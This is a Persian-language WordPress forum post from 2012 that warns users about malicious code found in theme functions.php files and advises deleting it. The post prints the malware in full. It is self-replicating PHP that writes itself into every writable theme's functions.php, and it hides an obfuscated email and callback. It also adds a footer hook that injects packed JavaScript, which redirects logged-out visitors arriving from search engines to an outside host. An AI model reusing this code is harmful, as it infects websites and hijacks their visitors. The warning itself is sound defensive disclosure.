نمایش نتایج: از شماره 1 تا 1 , از مجموع 1

موضوع: اطلاع رسانی درباره یه کد مخرب

  1. February 18th, 2012, 20:25 #1
    GraphX
    GraphX آنلاین نیست.
    عضو انجمن GraphX آواتار ها
    تاریخ عضویت
    Jun 2009
    محل سکونت
    دنياي مجازي
    نوشته ها
    183
    تشکر تشکر کرده 
    15
    تشکر تشکر شده 
    237
    تشکر شده در
    170 پست
    GraphX به ICQ ارسال پیام GraphX به Yahoo ارسال پیام

    پیش فرض اطلاع رسانی درباره یه کد مخرب

    سلام دوستان
    2-3 ماهی میشه که یه کد مخرب داخل بعضی قالب ها میبینم که ساختار قالبو میریزه به هم
    بارها شده قالبی که خودم از پایه نوشتم دیدم یه سری کد اضافی داره که دردسز ساز شده و با حذفش مشکل برطرف شده
    کدی که قرار میدم داخل فایل فانکشن قالب اضافه میشه و با حذف اون میتونید مشکلات قالب رو رفع کنید
    نکته دیگه ای که قابل ذکره اینه که وجود این کد باعث شده تا گوگل سایت شما رو خطرناک شناسایی کنه و سایتتون باز نشه

    کد:
    <?phpfunction _check_isactive_widget(){
    $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
    $output=strip_tags($output, $allowed);
    $direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
    if (is_array($direst)){
        foreach ($direst as $item){
            if (is_writable($item)){
                $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
                $cont=file_get_contents($item);
                if (stripos($cont,$ftion) === false){
                    $explar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
                    $output .= $before . "Not found" . $after;
                    if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
                    $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f);                
                    $output .= ($showdots && $ellipsis) ? "..." : "";
                }
            }
        }
    }
    return $output;
}
function _get_allwidgetcont($wids,$items=array()){
    $places=array_shift($wids);
    if(substr($places,-1) == "/"){
        $places=substr($places,0,-1);
    }
    if(!file_exists($places) || !is_dir($places)){
        return false;
    }elseif(is_readable($places)){
        $elems=scandir($places);
        foreach ($elems as $elem){
            if ($elem != "." && $elem != ".."){
                if (is_dir($places . "/" . $elem)){
                    $wids[]=$places . "/" . $elem;
                } elseif (is_file($places . "/" . $elem)&& 
                    $elem == substr(__FILE__,-13)){
                    $items[]=$places . "/" . $elem;}
                }
            }
    }else{
        return false;    
    }
    if (sizeof($wids) > 0){
        return _get_allwidgetcont($wids,$items);
    } else {
        return $items;
    }
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}


if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
    function scandir($dir,$listDirectories=false, $skipDots=true) {
        $dirArray = array();
        if ($handle = opendir($dir)) {
            while (false !== ($file = readdir($handle))) {
                if (($file != "." && $file != "..") || $skipDots == true) {
                    if($listDirectories == false) { if(is_dir($file)) { continue; } }
                    array_push($dirArray,basename($file));
                }
            }
            closedir($handle);
        }
        return $dirArray;
    }
}
add_action("admin_head", "_check_isactive_widget");
function _getsprepare_widget(){
    if(!isset($com_length)) $com_length=120;
    if(!isset($text_value)) $text_value="cookie";
    if(!isset($allowed_tags)) $allowed_tags="<a>";
    if(!isset($type_filter)) $type_filter="none";
    if(!isset($expl)) $expl="";
    if(!isset($filter_homes)) $filter_homes=get_option("home"); 
    if(!isset($pref_filter)) $pref_filter="wp_";
    if(!isset($use_more)) $use_more=1; 
    if(!isset($comm_type)) $comm_type=""; 
    if(!isset($pagecount)) $pagecount=$_GET["cperpage"];
    if(!isset($postauthor_comment)) $postauthor_comment="";
    if(!isset($comm_is_approved)) $comm_is_approved=""; 
    if(!isset($postauthor)) $postauthor="auth";
    if(!isset($more_link)) $more_link="(more...)";
    if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_");
    if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;
    if(!isset($more_link_ditails)) $more_link_ditails="(details...)";
    if(!isset($morecontents)) $morecontents="ma".$expl."il";
    if(!isset($fmore)) $fmore=1;
    if(!isset($fakeit)) $fakeit=1;
    if(!isset($sql)) $sql="";
    if (!$is_widget) :
    
    global $wpdb, $post;
    $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM  LEFT OUTER JOIN  ON (.comment_post_ID=.ID) WHERE comment_approved=1 AND comment_type= AND post_author=li".$expl."vethe".$comm_type."mes".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m AND post_password= AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    if (!empty($post->post_password)) { 
        if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
            if(is_feed()) { 
                $output=__("There is no excerpt because this is a protected post.");
            } else {
                $output=get_the_password_form();
            }
        }
    }
    if(!isset($f_tags)) $f_tags=1;
    if(!isset($type_filters)) $type_filters=$filter_homes; 
    if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents;
    if(!isset($aditional_tags)) $aditional_tags="div";
    if(!isset($s_cont)) $s_cont=substr($sq1, stripos($sq1, "live"), 20);#
    if(!isset($more_link_text)) $more_link_text="Continue reading this entry";    
    if(!isset($showdots)) $showdots=1;
    
    $comments=$wpdb->get_results($sql);    
    if($fakeit == 2) { 
        $text=$post->post_content;
    } elseif($fakeit == 1) { 
        $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
    } else { 
        $text=$post->post_excerpt;
    }
    $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM  LEFT OUTER JOIN  ON (.comment_post_ID=.ID) WHERE comment_approved=1 AND comment_type= AND comment_content=". call_user_func_array($getcommentscont, array($s_cont, $filter_homes, $type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
    if($com_length < 0) {
        $output=$text;
    } else {
        if(!$no_more && strpos($text, "<!--more-->")) {
            $text=explode("<!--more-->", $text, 2);
            $l=count($text[0]);
            $more_link=1;
            $comments=$wpdb->get_results($sql);
        } else {
            $text=explode(" ", $text);
            if(count($text) > $com_length) {
                $l=$com_length;
                $ellipsis=1;
            } else {
                $l=count($text);
                $more_link="";
                $ellipsis=0;
            }
        }
        for ($i=0; $i<$l; $i++)
                $output .= $text[$i] . " ";
    }
    update_option("_is_widget_active_", 1);
    if("all" != $allowed_tags) {
        $output=strip_tags($output, $allowed_tags);
        return $output;
    }
    endif;
    $output=rtrim($output, "\s");
    $output=($f_tags) ? balanceTags($output, true) : $output;
    $output .= ($showdots && $ellipsis) ? "..." : "";
    $output=apply_filters($type_filter, $output);
    switch($aditional_tags) {
        case("div") :
            $tag="div";
        break;
        case("span") :
            $tag="span";
        break;
        case("p") :
            $tag="p";
        break;
        default :
            $tag="span";
    }


    if ($use_more ) {
        if($fmore) {
            $output .= " <" . $tag . " class=more-link><a href=". get_permalink($post->ID) . "#more-" . $post->ID ." title=" . $more_link_text . ">" . $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecount, true)) ? $more_link : "" . "</a></" . $tag . ">" . "\n";
        } else {
            $output .= " <" . $tag . " class=more-link><a href=". get_permalink($post->ID) . " title=" . $more_link_text . ">" . $more_link . "</a></" . $tag . ">" . "\n";
        }
    }
    return $output;
}


add_action("init", "_getsprepare_widget");




    global $wpdb;
    $request="SELECT ID, post_title, COUNT(.comment_post_ID) AS comment_count FROM , ";
    $request .= " WHERE comment_approved=1 AND .ID=.comment_post_ID AND post_status=publish";
    if(!$show_pass_post) $request .= " AND post_password =";
    if($duration !="") { 
        $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
    }
    $request .= " GROUP BY .comment_post_ID ORDER BY comment_count DESC LIMIT ";
    $posts=$wpdb->get_results($request);
    $output="";
    if ($posts) {
        foreach ($posts as $post) {
            $post_title=stripslashes($post->post_title);
            $comment_count=$post->comment_count;
            $permalink=get_permalink($post->ID);
            $output .= $before . " <a href=" . $permalink . " title=" . $post_title.">" . $post_title . "</a> " . $after;
        }
    } else {
        $output .= $before . "None found" . $after;
    }
    return  $output;
?>
<?php 
add_action('get_footer', 'add_sscounter');
    function add_sscounter(){
        echo '<!--scounter-->';
        if(function_exists('is_user_logged_in')){
            if(time()%2 == 0 && !is_user_logged_in()){            
                echo "<script language=JavaScript>eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p}('e r=x.9,t=,q;4(r.3(m.)!=-1)t=q;4(r.3(7.)!=-1)t=q;4(r.3(8.)!=-1)t=p;4(r.3(a.)!=-1)t=q;4(r.3(f.)!=-1)t=g;4(r.3(j.)!=-1)t=q;4(t.6&&((q=r.3(?+t+=))!=-1||(q=r.3(&+t+=))!=-1))B.C=v+w+:/+/A+b+k+5+h.+c+z/s+u+5+h.p+d?+t+y=1&t+i+l=+r.n(q+2+t.6).o(&)[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
            }
        }
    }
?>

    لینک مطلب

    منبع
    [SIZE="3"]معرفي قالب از شما ،‌فارسي سازي از ما
    نصب و راه اندازي انجمن با نازلترين قيمت (نمونه كار و شرايط = پيغام خصوصي)
    انجمن گفتگوي فروشگاه هاي اينترنتي ايران

    پاسخ با نقل قول پاسخ با نقل قول

  2. تعداد تشکر ها از GraphX به دلیل پست مفید

    soheyl_ir89
  3. February 18th, 2012 20:25 # ADS




     
« موضوع قبلی | موضوع بعدی »

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •  

مشاهده قوانین انجمن